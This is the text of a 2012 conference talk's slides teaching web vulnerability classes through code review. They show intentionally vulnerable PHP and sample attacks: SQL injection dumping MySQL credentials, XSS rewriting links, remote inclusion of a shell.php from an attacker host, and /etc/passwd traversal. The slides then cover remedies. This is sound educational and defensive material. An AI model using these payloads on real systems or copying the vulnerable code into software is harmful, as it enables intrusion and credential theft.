These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
2. Talk overview
Introduction to commonly exploited web
application vulnerability classes (covering only
those caused by coding mistake(s))
Usage of code review on real-life vulnerabilities
as an educational tool
Mitigation in form of remedies
Note: While given examples will discuss PHP
coding (due to its overwhelming popularity on
the Web), the concepts also apply to any other
web programming language
October 13th, 2012 2
5. SQL injection (1)
Vulnerability on dynamic database queries that
include unfiltered user supplied input
Usually result of concatenation of raw
parameter values to a desired SQL statement
Various techniques used depending on target's
environment and affected vulnerable query
The goal is unauthorized access to the
underlying database
Involved in 60% of all breach incidents
examined by 7Safe in 2010
October 13th, 2012 5
6. SQL injection (2)
Example of vulnerable code (vuln.php):
<?php
...
$sql = "SELECT * FROM forum_logs WHERE id = " .
$_GET["id"];
$result = mysql_query($sql);
...
?>
Sample attack:
http://www.target.com/vuln.php?id=1 UNION ALL SELECT
NULL,CONCAT(user,0x3a,password),NULL FROM
mysql.user--
October 13th, 2012 6
7. Cross-site scripting (1)
Enables attackers to inject client-side script
into web pages viewed by other users
Everything from account hijacking, changing of
user settings, cookie theft/poisoning, or false
advertising is possible
Persistent (stored) and non-persistent
(reflected) variants
Samy (JS.Spacehero), first known XSS worm,
infected over 1 million MySpace profiles in less
than 20 hours
October 13th, 2012 7
8. Cross-site scripting (2)
Example of vulnerable code (vuln.php):
<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://www.site.com/">Click to
Visit</a>";
?>
Sample attack:
http://www.target.com/vuln.php?
name=<script>window.onload = function() {var
link=document.getElementsByTagName("a");link[0].href
="http://www.attacker.com/";}</script>
October 13th, 2012 8
9. File inclusion (1)
Allows inclusion of arbitrary code into
vulnerable application for further execution
Local file (LFI) and remote file (RFI) variants
Attacker's fondest wish (especially RFI)
Access anything that the original program
context is able to (configuration files, password
files, etc.)
Involved in 21% of all web application attacks
observed by Imperva in 2011
October 13th, 2012 9
10. File inclusion (2)
Example of vulnerable code (vuln.php):
<?php
$page = 'index';
if (isset($_REQUEST['page']))
$page = $_REQUEST['page'];
include($page . '.php');
?>
Sample attack:
http://www.target.com/vuln.php?
page=http://www.attacker.com/shell.php?foo=
October 13th, 2012 10
11. File disclosure (1)
Access files that are not intended to be
accessible and expose their content to the
attackers
Directory traversal variant in cases when
characters for traverse to the parent directory
(e.g. ../) are passed through to the file API(s)
Local file inclusion becomes a variant too if
used for obtaining a non-script content
Easiest for exploitation
October 13th, 2012 11
12. File disclosure (2)
Example of vulnerable code (vuln.php):
<?php
$template = 'default.php';
if (isset($_COOKIE['template']))
$template = $_COOKIE['template'];
readfile("templates/" . $template);
?>
Sample attack:
GET /vuln.php HTTP/1.0
Cookie: template=
../../../../../../../../../etc/passwd
October 13th, 2012 12
13. Remote code execution (1)
Provides a way to execute arbitrary code
In one variant provided code is being executed
inside the vulnerable web application (e.g.
eval)
In other, more common, content of one of
request parameters is being written to the
browser reachable file, giving attacker
opportunity to run it as a standalone script
TimThumb WordPress PHP plugin vulnerability
(CVE: 2011-4106) affected 1.2 million websites
October 13th, 2012 13
31. Remedies (1)
Data validation
Process of ensuring that application is running
with correct data
Discard if it doesn’t pass the validation process
if (!preg_match('/^(?d{3})?[-s.]?d{3}[-s.]d{4}$/',
$phone)) {
echo "Your phone number is invalid";
die();
}
October 13th, 2012 31
32. Remedies (2)
Data sanitization
Removing any unwanted bits from the data and
normalizing it to the correct form
$comment = strip_tags($_POST['comment']);
...
$id = intval($_GET['id']);
...
$username = preg_replace('/[^a-zA-Z0-9._]/', '',
$_REQUEST['username']);
...
$query = sprintf("SELECT * FROM users WHERE user='%s' AND
password='%s'", mysql_real_escape_string($user),
mysql_real_escape_string($password));
October 13th, 2012 32
33. Remedies (3)
Output escaping
Protecting integrity of displayed data
Prevents browser from applying any unintended
meaning to any special sequence of characters
that may be found
Always escape output provided by users!
echo "You searched for: " .
htmlspecialchars($_GET["query"], ENT_QUOTES);
October 13th, 2012 33
34. Remedies (4)
Safe communication with a database
Prepared statements use one channel for
commands and another one for data (which
never allows commands)
$db = new PDO('dblib:host=localhost; dbname=testdb;
charset=UTF-8', $user, $pass);
$query = 'SELECT * FROM users WHERE id = :id';
$stmt = $db->prepare($query);
$stmt->bindValue(':id', $_REQUEST['id']);
$stmt->execute();
while($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
...
October 13th, 2012 34